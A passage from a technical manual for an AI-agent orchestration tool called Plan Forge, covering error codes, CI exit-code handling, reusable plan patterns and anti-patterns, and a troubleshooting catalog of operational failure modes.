| DRIFT_DETECTED | PreToolUse hook | Worker tried to edit a file listed in the plan's Forbidden Actions. Revert the change, then re-run the slice. |
| ERR_UPDATE_DURING_RUN | REST 409 | POST /api/self-update was rejected because a plan is currently running. Abort the run or wait for it to finish. |
| GATE_COMMAND_FAILED | Orchestrator | Slice validation gate exited non-zero. Fix the build or test failure, then resume from the failed slice. |
| lock-hash-mismatch | Orchestrator / PreCommit chain | The plan's lockHash no longer matches the current plan body. Re-harden the plan to regenerate lockHash, then retry. |
| network-allowlist-violation | Orchestrator | Outbound call targeted a host outside network.allowed. Add the host to the allowlist or remove the outbound call. |
| NO_API_KEY | Provider tools | No provider API key is configured. Set XAI_API_KEY, OPENAI_API_KEY, or ANTHROPIC_API_KEY, or use the zero-key Copilot path when supported. |
| NO_REASONING_MODEL | Forge-Master | Forge-Master has no model configured and no provider key available. Set forgeMaster.reasoningModel or configure a provider key. |
| observer-budget-exceeded | Observer daemon | Forge-Master Observer hit its daily USD cap or hourly narration cap. Wait for the budget window to reset or widen the cap in .forge.json. |
| PLAN_ALREADY_EXISTS | Crucible finalize | Refused to overwrite an existing hand-authored plan. Read both files, then re-finalize with overwrite: true if you really mean it. |
| PLAN_NOT_FOUND | forge_run_plan | Plan path doesn't exist or is outside the workspace. Verify the path and keep plans under docs/plans by convention. |
| PLAN_PARSE_ERROR | forge_validate | Plan is missing required sections or has malformed slice headers. Run forge_validate to see the specific gap and repair it. |
| QUORUM_ALL_FAILED | Quorum mode | All quorum models timed out or errored. Check API keys and network connectivity, then retry; consider --quorum=speed if flagship models are unavailable. |
RATE_LIMITED | REST 429 | Request was throttled. Honor retryAfter or the provider reset window before retrying. |
REVIEW_REJECTED | Review Gate | Session 3 reviewer rejected the slice. Read the review artifact, address the findings, then rerun the slice. |
SCOPE_VIOLATION | PreToolUse hook | Worker edited a path outside the allowed scope contract. Revert the change and rerun with the correct scope. |
STRICT_GATES_REJECTED | Orchestrator | Strict gates refused a plan that would otherwise have escalated. Drop --strict-gates or strengthen the failing gate. |
tool-denied | Orchestrator | A worker or hook tried to invoke an MCP tool listed in tools.deny. Remove the tool from the denylist or update the prompt to avoid it. |
WORKER_TIMEOUT | Orchestrator | Worker exceeded its per-slice execution budget. Split the slice or switch to a faster model. |
In addition to exit codes and named errors, the WebSocket hub broadcasts error-class events that the dashboard and external watchers consume. The full taxonomy lives in Appendix V — Errors & warnings; the most operationally relevant are:
| Event | Severity | What it signals |
|---|---|---|
| slice-orphan-warning | warn | Failed slice's worker deliverables were staged but not committed. Recovery commands at .forge/runs/<runId>/orphans-slice-<N>.json. |
| drift-detected | error | PreToolUse hook caught a forbidden-file edit. Plan run aborts. |
| quorum-model-failed | warn | Individual model in a quorum panel timed out or errored. The panel proceeds with remaining responders unless threshold breaks. |
| gate-retry-exhausted | error | Slice gate failed all retries. Orchestrator marks slice failed, exits 1. |
| preDeploy-blocked | error | LiveGuard hook found a secret or unauthorized env var. Run aborts before the deploy slice executes. |
| observer:budget-blocked | warn | Forge-Master Observer hit its daily cost cap or hourly narration cap. Narrations are silently skipped until the budget window resets. No impact on plan execution. |
The smallest useful contract for a CI gate:
# Bash: fail the build on any exit ≠ 0
set -euo pipefail
pforge run-plan docs/plans/Phase-NN.md
# Exit 0 here means "completed" or "completed-with-warnings", both safe to ship
If you need to distinguish soft warnings from hard failures:
# Bash: parse the final JSON
output=$(pforge run-plan docs/plans/Phase-NN.md --json)
status=$(echo "$output" | jq -r '.status')
case "$status" in
completed) echo "Clean."; exit 0 ;;
completed-with-warnings) echo "Advisories, review the run log."; exit 0 ;;
failed) reason=$(echo "$output" | jq -r '.statusReason'); echo "FAILED ($reason)"; exit 1 ;;
aborted) echo "ABORTED, preserved state at .forge/runs/$(echo "$output" | jq -r '.runId')/"; exit 2 ;;
*) echo "UNKNOWN STATUS: $status"; exit 1 ;;
esac
For PowerShell with explicit exit-code branching:
# PowerShell
pforge run-plan docs/plans/Phase-NN.md
switch ($LASTEXITCODE) {
0 { Write-Host "Plan completed" -ForegroundColor Green }
1 { Write-Host "Plan failed - check .forge/runs/" -ForegroundColor Red; exit 1 }
2 { Write-Host "Environment refusal - check pforge smith" -ForegroundColor Yellow; exit 2 }
default { Write-Host "Unknown exit code: $LASTEXITCODE" -ForegroundColor Magenta; exit $LASTEXITCODE }
}
- NO_API_KEY and NO_REASONING_MODEL resolution.
- .forge.json hooks, configures the LiveGuard preDeploy hook behind preDeploy-blocked.
A catalog of reusable plan archetypes. For each pattern: when to reach for it, the typical slice shape, the validation gate flavor, recommended quorum mode, and the failure modes the pattern is designed to avoid. Use this when starting a new plan and you want to skip thinking about structure from scratch.
forge_crucible_ask can also be asked "which plan pattern fits <task>?" and will return a pointer to the right section here.
| Pattern | When | Slices |
|---|---|---|
| P1 — Add an Entity | New domain object end-to-end (DB → service → API → UI) | 4–7 |
| P2 — Add an Endpoint | New REST / RPC route on existing entity | 2–3 |
| P3 — Add an External Integration | Wire up a third-party API (Stripe / SendGrid / S3 / etc.) | 4–5 |
| P4 — Refactor a Subsystem | Extract / split / rename module with multiple consumers | 3–6 (one per consumer) |
| P5 — Fix a Regression | Bug landed in a previous slice; need repro + fix + guard | 2–3 |
| P6 — Hotfix | Production incident, minimal-surface emergency change | 1–2 |
| P7 — Feature Flag Rollout | Risky change you want to ship dark, toggle on later | 4–5 |
| P8 — Data Migration | Schema change requiring backfill + verification | 4–6 |
| P9 — Dependency Upgrade | Breaking-change SDK / framework bump | 3–5 |
| P10 — Performance Fix | Profile-driven targeted optimization | 2–3 |
| P11 — Security Patch | CVE / vulnerability with minimal-surface fix | 2–3 |
| P12 — Documentation Phase | Multi-document writing pass (manual chapters, runbooks, API docs) | 1 per document |
| P13 — CI/CD Workflow Change | Modify GitHub Actions / pipelines / deploy automation | 1–2 + manual verify |
| P14 — Spike-Then-Build | Unfamiliar domain; need exploration before committing to a design | 1 spike + N build slices in a follow-up plan |
When: a new first-class noun in your domain that needs persistence, an API surface, and (often) a UI. The most common shape.
Slice shape (4–7 slices):
Gate flavor: each slice ends with the test command for its layer (vitest repository.test, vitest service.test, vitest controller.integration.test). The final slice runs the full sweep.
Quorum: auto. The slices are routine; power is overkill.
Failure modes avoided: collapsing layers (controller doing DB writes), missing the OpenAPI update, forgetting to wire the migration into the test setup.
When: a new route on an existing entity. No schema change, no UI.
Slice shape (2–3 slices):
Gate flavor: per-slice unit / integration test command. Final gate also runs the OpenAPI lint / contract diff.
Quorum: auto or disabled for trivial CRUD additions.
Failure modes avoided: route registered but not wired to service; OpenAPI drift from implementation.
When: bringing in Stripe, SendGrid, S3, Twilio, or an internal RPC service; in short, anywhere your code calls an outside system.
Slice shape (4–5 slices):
Gate flavor: unit tests use the fake; the real-adapter slice may have an opt-in SMOKE=1 guard that hits a sandbox.
Quorum: auto; bump to power for the retry/circuit-breaker slice if SLA-critical.
Failure modes avoided: timeouts not configured (hang forever), retries not idempotent-safe, secrets in source.
When: extracting a module, splitting a god-class, renaming a heavily-referenced symbol. Multiple consumers must update.
Slice shape (3–6 slices):
Gate flavor: per-consumer slice gates run that consumer's test file. Final slice runs the full sweep + a grep that asserts zero references to the old shape.
Quorum: auto. Per-consumer slices are mechanical; quorum doesn't help.
Failure modes avoided: big-bang rename that breaks the whole tree at once; consumer drift (one consumer left on the old shape).
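The "zero references to the old shape" check in the final gate can be wrapped in a small helper. This is a minimal sketch, not Plan Forge tooling: the function name `assert_no_references`, the example symbol, and the directory are all hypothetical. It separates "no matches" from "grep could not search", so a mistyped directory does not pass the gate silently.

```shell
# Hypothetical gate helper (not part of Plan Forge): fail if the old
# name still appears anywhere under the given directory.
assert_no_references() {
  local pattern="$1" dir="$2" status=0
  # -r recurse, -n show line numbers, -F treat the pattern as a fixed string
  grep -rnF -- "$pattern" "$dir" || status=$?
  case "$status" in
    0) echo "stale references to '$pattern' remain under $dir" >&2; return 1 ;;
    1) return 0 ;;  # grep exits 1 when nothing matched: the rename is complete
    *) echo "grep could not search $dir (exit $status)" >&2; return 2 ;;
  esac
}

# Example gate line (symbol and path are placeholders):
#   assert_no_references "LegacyUserStore" src
```

Matching lines are printed with file and line number, so a failing gate also tells the worker which consumer was left behind.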
When: something that worked before now doesn't, and the previous slice that introduced the bug has been identified.
Slice shape (2–3 slices, strict TDD):
Gate flavor: the red slice's gate must assert the test fails (e.g. vitest run regression.test 2>&1 | grep -q "1 failed"). The green slice's gate asserts it now passes.
Quorum: auto for green; disabled is often fine for red.
Failure modes avoided: "fix" that doesn't actually fix; scope creep that buries the actual fix in unrelated changes.
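A red-slice gate has to succeed when the test fails. One way to express that inversion is sketched below; `expect_failure` is a hypothetical helper name, not a Plan Forge command. It is coarser than grepping for "1 failed": any non-zero exit counts, including a typo in the test name, so treat it as a starting point only.

```shell
# Hypothetical helper: succeed only if the wrapped command fails.
expect_failure() {
  if "$@" >/dev/null 2>&1; then
    echo "expected failure, but command passed: $*" >&2
    return 1
  fi
  return 0
}

# Example red-slice gate (test name taken from the gate example above):
#   expect_failure npx vitest run regression.test
```

The green slice then uses the plain test command as its gate, with no wrapper.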
When: production is broken; minutes matter; the change is small and reversible.
Slice shape (1–2 slices):
Gate flavor: fast (under 30s if possible). Skip the broad sweep; run only the affected test file. The completeness sweep can be deferred to a follow-up plan.
Quorum: disabled. Hotfix is about speed and reversibility, not consensus.
Failure modes avoided: bundling "improvements" into the hotfix (each line shipped is a line to roll back); over-validation while production burns.
Follow-up: file a P5 (Fix a Regression) plan once the fire is out, to add proper test coverage and address root cause.
When: a change risky enough to ship dark: a new algorithm, a vendor swap, a UI redesign.
Slice shape (4–5 slices):
Gate flavor: tests must pass with flag both ON and OFF. The implementation slice's gate explicitly runs the suite twice with different env vars.
Quorum: power for the implementation slice (high blast radius); auto elsewhere.
Failure modes avoided: flag-on path untested; flag never cleaned up (becomes permanent technical debt).
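Running the suite once per flag state can be sketched as a loop over environment values. Everything named here is an assumption: the helper `run_with_flag_matrix`, the flag variable, and the values `on` and `off` depend on how your flag system reads configuration.

```shell
# Hypothetical helper: run the same command once per flag state.
# $1 is the environment variable your code reads; the values "on" and
# "off" are assumptions, adjust them to your flag system.
run_with_flag_matrix() {
  local flag_var="$1" value
  shift
  for value in on off; do
    # env sets the variable for this one invocation only
    if ! env "$flag_var=$value" "$@"; then
      echo "suite failed with $flag_var=$value" >&2
      return 1
    fi
  done
  return 0
}

# Example gate line (variable name and test command are placeholders):
#   run_with_flag_matrix FEATURE_NEW_RANKER npx vitest run
```

Because `env` launches an external program, the wrapped command must be an executable, not a shell function.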
When: a schema change requires moving / reshaping existing data, not just altering the schema.
Slice shape (4–6 slices):
Gate flavor: each slice's gate asserts the migration is idempotent (re-running it leaves the DB unchanged). Final slice's gate runs against a production-shape fixture.
Quorum: power for the migration, backfill, and remove-old slices (irreversible if wrong); auto elsewhere.
Failure modes avoided: irreversible migrations without a rollback path; backfills that lock production tables; reads switching before the data is fully migrated.
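The idempotency assertion in the gate can be sketched as "apply twice, compare snapshots". The helper name `assert_idempotent` and both command arguments are hypothetical; what counts as a meaningful snapshot (schema dump, row counts, checksums) depends on your database and is not specified by the source.

```shell
# Hypothetical gate helper: apply a migration twice and require that the
# second run changes nothing. Both arguments are shell command strings:
#   $1 = command that applies the migration
#   $2 = command that prints a comparable snapshot of the resulting state
assert_idempotent() {
  local migrate="$1" snapshot="$2" first second
  sh -c "$migrate" || return 1
  first=$(sh -c "$snapshot") || return 1
  sh -c "$migrate" || return 1
  second=$(sh -c "$snapshot") || return 1
  if [ "$first" != "$second" ]; then
    echo "migration is not idempotent: state changed on the second run" >&2
    return 1
  fi
  return 0
}

# Example gate line (both commands are placeholders):
#   assert_idempotent "npm run migrate" "npm run --silent db:schema-dump"
```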
When: a major-version bump on a library / framework / SDK with breaking changes.
Slice shape (3–5 slices):
Gate flavor: each per-module slice's gate runs the test set for that module. Final slice's gate runs the full sweep.
Quorum: auto. Mechanical replacements; quorum adds little.
Failure modes avoided: trying to do all the fixes in one slice (un-reviewable diff); missing transitive breakage (final-sweep gate catches it).
When: profiling has identified a specific hotspot and you want to fix it without speculative changes.
Slice shape (2–3 slices):
Gate flavor: the fix slice's gate runs the benchmark and asserts the new number beats the baseline by the documented margin (e.g. node bench/users.bench.mjs | grep -E "throughput.*[5-9][0-9]{3}").
Quorum: auto. The hot loop is small; the change should be small.
Failure modes avoided: optimizing without measuring; broad refactors disguised as performance work.
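The regex in the gate example encodes the threshold as character classes, which can misjudge values with a different number of digits (a throughput of 10000 does not match `[5-9][0-9]{3}`). A numeric comparison is one alternative, sketched here with a hypothetical helper `meets_baseline`. How the measured number is extracted from the benchmark output is left to you, since the source does not specify the output format.

```shell
# Hypothetical helper: succeed only if MEASURED beats BASELINE by at least
# MARGIN_PERCENT. Intended for higher-is-better metrics such as throughput.
meets_baseline() {
  # usage: meets_baseline MEASURED BASELINE MARGIN_PERCENT
  # Compares m*100 >= b*(100+p) to avoid a floating-point division.
  awk -v m="$1" -v b="$2" -v p="$3" \
    'BEGIN { exit !(m * 100 >= b * (100 + p)) }'
}

# Example: require at least a 10% gain over a recorded baseline of 5000.
#   meets_baseline "$measured" 5000 10
```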
When: a CVE in a dependency, a misconfiguration finding, or a discovered vulnerability in your own code.
Slice shape (2–3 slices):
Gate flavor: the fix slice's gate runs the regression test plus forge_secret_scan on the diff. PreDeploy LiveGuard hook applies if shipping to a deploy slice.
Quorum: auto or power, depending on blast radius.
Failure modes avoided: scope creep (fixing other things "while we're here"); regression test that doesn't actually exercise the vulnerable path.
See also Chapter 30 — Incident response.
When: writing several documents at once (manual chapters, runbooks, API docs) over multiple sessions.
Slice shape (1 per document):
node docs/manual/maintain.mjs).
Gate flavor: the validator runs twice consecutively. The first pass detects drift; the second pass confirms the auto-regeneration converged.
Quorum: auto. Doc writing is iterative; quorum doesn't help much.
Failure modes avoided: documents that reference each other but drift apart; orphan files not registered in indexes; bundled commits that touch many unrelated documents at once.
Real-world example: this manual's Phase-MANUAL-EBOOK-COMPLETION-PLAN.md is a literal P12 instance.
When: modifying GitHub Actions, deploy pipelines, or release automation. The change can't be fully tested locally.
Slice shape (1–2 slices + manual verify):
Gate flavor: local syntax check (e.g. actionlint .github/workflows/*.yml); the real verification happens by observing the next CI run on a branch.
Quorum: auto; bump to power if the change touches deploy gating.
Failure modes avoided: committing a broken workflow that bricks CI for the whole team; deploy steps that worked in the sandbox but fail in production.
When: unfamiliar domain, unclear design space. You need to learn before you commit.
Slice shape (1 spike + a follow-up build plan):
docs/research/.
Gate flavor: the spike's gate is "an ADR or design note exists" (e.g. test -f docs/research/spike-NN-decision.md). The time-box is enforced by reviewing the document and explicitly killing the run if it produced code.
Quorum: power. Spikes benefit from diverse perspectives precisely because the question is open.
Failure modes avoided: spike code accidentally landing in production; spike that produces no decision (just code); spike that bleeds into multi-week exploration without a checkpoint.
Real phases often combine patterns. A typical feature ship might be:
Each phase is a separate plan file, runnable independently, revertable independently, reviewable independently. That's the architectural payoff: small phases compose; mega-phases don't.
Shapes that look like patterns but degrade outcomes. If your plan resembles one of these, refactor the plan before running it.
| Anti-pattern | Why it fails | Refactor to |
|---|---|---|
| Mega-slice (one slice, 20+ files) | Un-reviewable diff; one failure rolls back everything; no useful intermediate state. | Split into per-layer / per-consumer slices (P1 or P4). |
| Test-after (separate slice that only adds tests for code shipped earlier) | Test slice often "happens to pass" because it's written to match observed behavior, not specified behavior. | Move tests into the slice that ships the code (or use P5's strict red-then-green for genuine retrofit). |
| Sweep-only-at-end | All earlier slices appeared green; the sweep at the end discovers cross-slice breakage that's now expensive to localize. | Run sweep as part of every slice's gate (cost: seconds; benefit: bisectability). |
| Plan-as-essay (long prose, vague scope contracts) | Worker treats it as inspiration rather than contract; scope drift becomes the norm. | Use the standard plan template: explicit Scope Contract + Forbidden Actions + per-slice gate command. See the AI Plan Hardening Runbook. |
| Quorum-power for everything | 10× cost without measurable quality lift on routine slices. | Default auto; opt into power per-slice or per-phase where it actually helps. |
| No rollback path (data migration, infra change with no documented revert) | If anything goes wrong post-deploy, you're improvising under stress. | P8 explicitly lists rollback as a slice; P13 requires a no-op step before promote. Add a Notes section to every plan that describes the revert path. |
Common Plan Forge failure modes organized by layer. For each: symptom, diagnosis path, recovery action, and prevention. This appendix is the operator's companion to Appendix X — Errors & Exit Codes: Appendix X lists what the system says; Appendix Z lists what to do.
The forge_diagnose tool and the /health-check skill cover most cases automatically; this catalog is for when you need to understand why the automation suggests what it does.
Symptom: worker response truncated mid-sentence or mid-tool-call; error like max_tokens reached or HTTP 200 with finish_reason: length.
Diagnosis: check forge_watch_live for the slice's input + output token counts; compare to the model's context window. Most often the prompt grew beyond budget after a few file reads.
Recovery: split the slice. The scope was too broad. Re-run with a tighter file list. If splitting isn't practical, switch the slice's model to one with a larger context (Opus 1M, GPT-5.5).
Prevention: target 1–4 files per slice; use scope contracts; let auto quorum route bigger slices to larger-context models.
Symptom: orchestrator waits past the configured provider.timeoutMs and aborts. Status reason: worker-signaled or provider-timeout.
Diagnosis: provider status page; forge_watch_live shows the last successful token timestamp. If the model was streaming and then stopped, the network broke. If it never streamed, the provider is overloaded.
Recovery: pforge run-plan --resume-from <slice>. The retry will use the same prompt; provider issues are usually transient. If repeated, switch provider via --model.
Prevention: keep the provider list in .forge.json#modelRouting.fallback populated so auto mode can fail over without manual intervention.
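Because provider timeouts are usually transient, a CI job may want to retry the resume a bounded number of times before switching providers. The wrapper below is a generic sketch with a hypothetical name, `retry_with_backoff`; it is not the orchestrator's own retry logic, and the attempt count and delay in the usage comment are arbitrary.

```shell
# Hypothetical CI wrapper: retry a command with a doubling delay.
retry_with_backoff() {
  # usage: retry_with_backoff MAX_ATTEMPTS INITIAL_DELAY_SECONDS CMD [ARGS...]
  local max_attempts="$1" delay="$2" attempt=1
  shift 2
  while true; do
    if "$@"; then
      return 0
    fi
    if [ "$attempt" -ge "$max_attempts" ]; then
      echo "giving up after $attempt attempts: $*" >&2
      return 1
    fi
    sleep "$delay"
    delay=$((delay * 2))        # 30s, 60s, 120s, ...
    attempt=$((attempt + 1))
  done
}

# Example (slice id is a placeholder):
#   retry_with_backoff 3 30 pforge run-plan --resume-from <slice>
```

Keep the attempt count small. If the same slice fails repeatedly, the source's advice to switch provider via --model applies.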
Symptom: model returns a tool-call block with invalid JSON, wrong argument types, or a tool name that doesn't exist. Orchestrator surfaces tool-call-invalid.
Diagnosis: inspect .forge/runs/<runId>/trajectory.jsonl for the raw tool-call frame.
Recovery: the orchestrator retries with the parse error fed back to the model. If 3 retries fail, the slice errors. Manual fix: tighten the tool's inputSchema in the MCP server so the model gets a clearer contract on the next attempt.
Prevention: follow the forge_search ACI gold standard for new tools: bounded payloads, sparse fields, explicit schemas, friendly empty-state messages.
Symptom: PreToolUse hook fires; worker's edit is rejected with scope-violation or forbidden-action. Slice fails or worker pivots to a different file.
Diagnosis: read the hook's output line; it names the file and the rule. Compare against the plan's Scope Contract and Forbidden Actions sections.
Recovery: two paths. (a) If the worker was wrong (genuine scope creep), let the block stand; the system is working as designed. (b) If the plan was too narrow (the legitimate fix requires touching a file the scope doesn't allow), edit the plan to widen scope, file a plan-defect meta-bug, then resume.
Prevention: write Scope Contracts that match the slice's true file set. Underscoped plans are the #1 source of FM4. See the AI Plan Hardening Runbook for scope-sizing guidance.
Symptom: the worker calls the same tool with the same arguments N times in a row, or alternates between two tool calls indefinitely. Orchestrator emits loop-detected and aborts the slice.
Diagnosis: trajectory.jsonl shows the repeating pattern. Common cause: the model is reading a file, "concluding," then reading it again because no progress was made.
Recovery: abort with forge_abort if not already aborted. Split the slice or give the worker a clearer next-step instruction in the plan. If the loop is between two specific tools, check whether one of them has an ambiguous empty-state message (see Appendix X — MCP tool errors).
Prevention: ACI hygiene. Tools must return friendly messages on empty results, not bare { hits: [] }.
Symptom: gate command exits non-zero; test runner reports failed assertions.
Diagnosis: read the gate output. The orchestrator's retry loop will feed the failure back to the worker and let it try again (up to execution.maxRetries).
Recovery: let the retry happen. If it still fails after retries, the slice's gate is the truth: assume the implementation is wrong until triage says otherwise. Triage: is the test correct? Is the implementation incomplete? Is the test too strict?
Prevention: tight, fast gates that fail with clear error messages. Loose gates pass bad work; cryptic gates leave the worker spinning.
Symptom: gate runs past the configured timeout (default 120s); orchestrator kills it. Status reason: gate-timeout.
Diagnosis: was the test suite legitimately too big, or did a test hang? Try running the gate command manually; observe time-to-completion.
Recovery: if legitimate, raise the timeout for that slice in the plan's per-slice gateTimeoutMs. If a hang, fix the test (often a missing mock for an async call or an unbounded retry loop).
Prevention: gates should run in <30s ideally, <60s comfortably. Slice-level gates that need to run a 5-minute suite are usually a smell; consider running the small slice gate plus a separate periodic sweep.
Symptom: gate passes on the plan author's machine but fails on another platform (typically Windows). Common: bash pipe-to-brace-group like grep -c | { read n; [ "$n" -ge 1 ]; } where the inner variable is invisible through the cmd→bash shim.
Diagnosis: gate output shows the failure on the second machine; manual run of the gate command reproduces it.
Recovery: rewrite the gate to use simple, portable shell. Prefer grep -q PATTERN file and test -f path over complex pipe-fests. Avoid pipe-to-brace-group; use intermediate files if you need to capture counts.
Prevention: see AI Plan Hardening Runbook — portable gate commands.
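A count-based gate can avoid the pipe-to-brace-group shape by sending the count through an intermediate file, as the recovery advice suggests. The sketch below uses a hypothetical helper, `has_at_least`; whether it behaves identically under every Windows shell shim has not been verified here. For a plain presence check, `grep -q PATTERN file` remains the simpler choice.

```shell
# Hypothetical helper: succeed if FILE has at least N lines matching PATTERN.
# No pipe into a brace group; the count is passed through a temp file.
has_at_least() {
  # usage: has_at_least N PATTERN FILE
  local want="$1" pattern="$2" file="$3" count_file count
  count_file=$(mktemp) || return 2
  # grep -c prints the count; it exits 1 on zero matches, which is fine here
  grep -c -- "$pattern" "$file" > "$count_file" 2>/dev/null || true
  count=""
  read -r count < "$count_file" || true
  rm -f "$count_file"
  # An unreadable file leaves count empty, which is treated as 0
  [ "${count:-0}" -ge "$want" ]
}

# Example gate line (pattern and path are placeholders):
#   has_at_least 1 "export function createUser" src/users/service.ts
```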
Symptom: gate validator (e.g. node docs/manual/maintain.mjs) reports drift: orphan files, missing index entries, broken cross-refs.
Diagnosis: the validator output lists every drift item. Typical: a new file was created but not registered in the index SEARCH_SECTIONS array.
Recovery: run the validator twice. The first pass detects drift and auto-regenerates derived files (book-index, list-of-figures, glossary). The second pass confirms convergence. If the second pass still shows drift, fix manually (usually a missing manual.js registration).
Prevention: P12 (Documentation Phase) pattern in Appendix Y mandates the twice-validate gate.
Symptom: orchestrator can't launch the worker subprocess; exits with worker-spawn-failed. On Windows: ENOENT from spawn.
Diagnosis: usually a missing CLI on PATH (e.g. claude, cursor-agent, codex). Run pforge smith; it lists which agent CLIs are present.
Recovery: install or reinstall the worker CLI; verify with where claude (Windows) / which claude (POSIX). On Windows, restart the IDE after PATH changes: child processes inherit the IDE's PATH at spawn time, so an IDE that is already running keeps handing out the old value.
Prevention: pforge smith in your project's preflight; /health-check skill on session start.
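For a POSIX preflight script, the PATH check can be approximated with `command -v`. This is a small sketch that complements pforge smith rather than replacing it; the helper name `require_clis` is hypothetical, and the CLI names in the usage comment are the ones mentioned in the diagnosis above.

```shell
# Hypothetical preflight helper: report every CLI that is not on PATH.
require_clis() {
  local cli missing=0
  for cli in "$@"; do
    if ! command -v "$cli" >/dev/null 2>&1; then
      echo "missing on PATH: $cli" >&2
      missing=1
    fi
  done
  return "$missing"
}

# Example: list only the agent CLIs your plans actually use.
#   require_clis claude codex
```

The loop checks every name before returning, so one run reports all missing tools instead of stopping at the first.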
Symptom: failed slice rolled back; git stash pop reports merge conflicts because foreign files were modified during the run.
Diagnosis: git status shows conflict markers in files the slice was not supposed to touch.
Recovery: resolve conflicts manually, then drop the stash with git stash drop. The v3.3.4 / v3.3.5 fixes addressed the most common shapes of this (snapshot-apply-then-drop ordering); if you hit it on a current Plan Forge version, file an orchestrator-defect meta-bug.
Prevention: don't make manual edits while a plan is running. The orchestrator's snapshot model assumes the working tree is stable during execution.
Symptom: orchestrator can't apply the pre-slice snapshot to roll back a failed slice. Status reason: snapshot-apply-failed.
Diagnosis: .forge/runs/<runId>/snapshots/ contains the snapshot artifacts; inspect git output for the actual failure (usually a file-permission issue or a concurrent index lock).
Recovery: manually restore from the snapshot or from the prior git commit. git reflog shows the orchestrator's commits; git reset --hard <sha> to the pre-slice state if necessary.
Prevention: ensure no other git operations are running against the repo during plan execution; close other IDE windows that might be touching the index.
Symptom: pforge run-plan exits with code 2 (EX_USAGE) and a plan-parse error. Common: duplicate slice headers, missing required sections, malformed bash gate fences.
Diagnosis: error message names the line. pforge check <plan> validates standalone.
Recovery: fix the markdown. Common issues: two slices with the same heading text; gate code-fence not closed; ### Slice N heading without a following body.
Prevention: run pforge check before pforge run-plan; the Crucible's plan-hardening pass (Session 1) catches most parse errors before they reach execution.
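Duplicate slice headings are easy to spot before the parser does. The sketch below is a quick text check, not a substitute for pforge check: the helper name is hypothetical, and it assumes slice headings start with `### Slice ` as in the recovery note above.

```shell
# Hypothetical pre-check: print any "### Slice ..." heading that appears
# more than once in the plan file, and fail if there is one.
find_duplicate_slice_headers() {
  local plan="$1" dupes
  # uniq -d prints one copy of each line that occurs more than once
  dupes=$(grep -E '^### Slice ' "$plan" | sort | uniq -d)
  if [ -n "$dupes" ]; then
    printf 'duplicate slice headings:\n%s\n' "$dupes" >&2
    return 1
  fi
  return 0
}

# Example:
#   find_duplicate_slice_headers docs/plans/Phase-NN.md
```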
Symptom: provider returns 429; orchestrator surfaces provider-rate-limit.
Diagnosis: check provider's rate-limit headers (x-ratelimit-remaining-requests, x-ratelimit-reset-*). Are you over your tier's per-minute or per-day cap?
Recovery: the orchestrator backs off and retries automatically (configurable in .forge.json#execution.backoff). Manual: switch to a different provider via --model until the window resets, or upgrade your provider tier.
Prevention: spread load across providers via modelRouting.fallback; reserve power quorum for slices that actually need it (each panelist counts against the rate limit).
Symptom: 500/502/503 from provider; sustained failures over multiple retries.
Diagnosis: check the provider's status page. If a single provider is degraded, fail over.
Recovery: pforge run-plan --resume-from <slice> --model <different-provider>. Multi-provider routing in auto mode handles this automatically when configured.
Prevention: maintain keys for at least two providers (Anthropic + OpenAI is the common pairing). The marginal cost of having a fallback key configured is zero until you need it.
Symptom: provider returns 401/403; or gh auth login token expired (relevant for Copilot routing).
Diagnosis: pforge smith reports auth status per provider. For GitHub Copilot: gh auth status.
Recovery: rotate the API key (env var or .forge/secrets.json); for OAuth: gh auth login again. Resume the plan.
Prevention: rotate keys before they expire; for OAuth, the LiveGuard preDeploy hook can be extended to call gh auth status as part of its checks.
Symptom: forge_memory_report errors with JSON parse exception; memory search returns empty.
Diagnosis: open .forge/memory/L2.jsonl; look for a truncated last line (write interrupted by crash).
Recovery: remove the corrupt line. Re-run forge_memory_report to verify. The file is append-only JSONL, so recovery is just trimming the last line.
Prevention: don't kill the orchestrator mid-write. The flush-on-write design minimizes the window, but it's not zero.
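Trimming the truncated last line can be done with a backup first. This is a minimal sketch with a hypothetical helper name, `drop_last_line`; it removes the final line unconditionally, so inspect the file and confirm the last line really is the corrupt one before running it.

```shell
# Hypothetical recovery helper: back up a JSONL file, then remove its
# final line. Only use it after confirming that line is the corrupt one.
drop_last_line() {
  local file="$1"
  cp -- "$file" "$file.bak" || return 1
  # sed '$d' deletes the last line, including one with no trailing newline
  sed '$d' "$file.bak" > "$file"
}

# Example (path from the diagnosis step above):
#   drop_last_line .forge/memory/L2.jsonl
```

The `.bak` copy stays next to the original, so the trim is reversible if the wrong line was removed.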
Symptom: memory_recall calls timing out; OpenBrain (or your configured L3) not responding.
Diagnosis: curl the configured memory.l3Endpoint; check network and auth token.
Recovery: L3 is opt-in and the orchestrator falls back to L2-only when L3 is down. No slice should fail because L3 is unreachable. If a slice does, the worker is over-relying on L3 hints; tighten the plan's instructions so that L3 is advisory rather than required.
Prevention: treat L3 as a hint surface, not a contract. The plan should be runnable with L3 off.
Symptom: PreToolUse blocks an edit that the plan's scope actually allows; or LiveGuard preDeploy flags a "secret" that's a placeholder constant.
Diagnosis: hook output names the rule. Inspect the rule's pattern; compare against the actual content.
Recovery: tighten the pattern (forge_secret_scan ignore patterns are configurable). For scope hooks, widen the Scope Contract in the plan.
Prevention: tune secret-scan ignore patterns when you add codebase-specific constants that match common secret shapes (e.g. fixture IDs that look like API keys).
Symptom: a hook script exits non-zero with an actual scripting error (not a policy denial).
Diagnosis: hook output includes the script's stderr. Most common: pwsh-vs-bash mismatch on the wrong platform.
Recovery: fix the script; run it manually to verify. Hook scripts live in .github/hooks/<Event>.md with code fences for each platform.
Prevention: keep both bash and pwsh blocks for every hook; /health-check exercises hooks during smoke testing.
Symptom: quorum panel returns; no answer reaches the configured threshold. Slice fails with quorum-no-consensus.
Diagnosis: forge_quorum_analyze on the run id shows each panelist's answer; look for fundamental disagreement (different APIs proposed, different architectural choices) vs near-misses on wording.
Recovery: split the slice into a P14 (Spike) plus a build slice. The disagreement signal is the panel telling you the question is ambiguous; resolve the ambiguity at the plan level, not by re-running the same quorum.
Prevention: clearer slice prompts; tighter Scope Contracts. Quorum disagreement is usually a plan-quality signal.
Symptom: one or more panelists fail to respond before the per-panelist timeout. Quorum either proceeds with fewer voices (if remaining count ≥ threshold) or fails.
Diagnosis: trajectory.jsonl shows which panelist timed out and at what stage.
Recovery: if quorum failed due to insufficient responders, retry with --quorum=auto (smaller panel, less rate-limit risk) or after the timed-out provider recovers.
Prevention: configure .forge.json#quorum.panelistTimeoutMs to a value your slowest provider tolerates; for cost-sensitive workflows, prefer auto over power: fewer panelists means fewer timeout opportunities.
Symptom: hub or MCP server can't bind to 3100/3101/3102; exits with EADDRINUSE.
